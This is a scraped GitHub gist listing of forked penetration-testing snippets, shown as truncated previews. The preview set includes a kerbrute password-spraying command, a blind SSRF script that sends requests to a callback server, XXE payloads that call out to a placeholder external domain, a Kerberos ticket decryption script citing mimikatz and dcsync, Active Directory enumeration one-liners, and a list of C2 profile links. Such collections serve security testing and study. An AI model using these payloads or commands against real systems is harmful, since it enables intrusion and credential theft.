With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
iNoSec2
iNoSec2
/ ejs.sh
Created
April 18, 2020 07:08
— forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
| function ejs() { | |
| curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
| } | |
| Debug mode (recommended): | |
| curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))pr |
iNoSec2
/ ssrf.sh
Created
May 7, 2020 10:50
— forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
iNoSec2
/ brightnessControl.sh
Created
September 17, 2020 20:56
— forked from Blaradox/brightnessControl.sh
Notifications for brightness and volume, using dunstify
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # You can call this script like this: | |
| # $ ./brightnessControl.sh up | |
| # $ ./brightnessControl.sh down | |
| # Script inspired by these wonderful people: | |
| # https://github.com/dastorm/volume-notification-dunst/blob/master/volume.sh | |
| # https://gist.github.com/sebastiencs/5d7227f388d93374cebdf72e783fbd6a |
iNoSec2
/ xxe-payloads.txt
Created
November 18, 2020 06:13
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
iNoSec2
/ whey-cewler.py
Created
June 3, 2021 08:34
— forked from lanmaster53/whey-cewler.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written | |
| in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer | |
| runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It | |
| does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in | |
| convenience. | |
| The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written | |
| in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python, | |
| making it "way cooler". |
iNoSec2
/ decryptKerbTicket.py
Created
September 10, 2021 14:37
— forked from tothi/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected] |
iNoSec2
/ 1) Active Directory One Liners
Created
September 14, 2021 19:34
— forked from w00tc/1) Active Directory One Liners
Some Pentesting Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
iNoSec2
/ kerberos_attacks_cheatsheet.md
Created
November 18, 2021 14:43
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
iNoSec2
/ PKI_Abuse_cheatsheet.md
Created
January 29, 2022 14:23
— forked from Flangvik/PKI_Abuse_cheatsheet.md
PKI Abuse CheatSheet
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
iNoSec2
/ malleable_c2_profiles_09272021
Created
June 4, 2022 22:15
— forked from MHaggis/malleable_c2_profiles_09272021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs | |
| https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md | |
| https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py | |
| https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md | |
| https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4 |
OlderNewer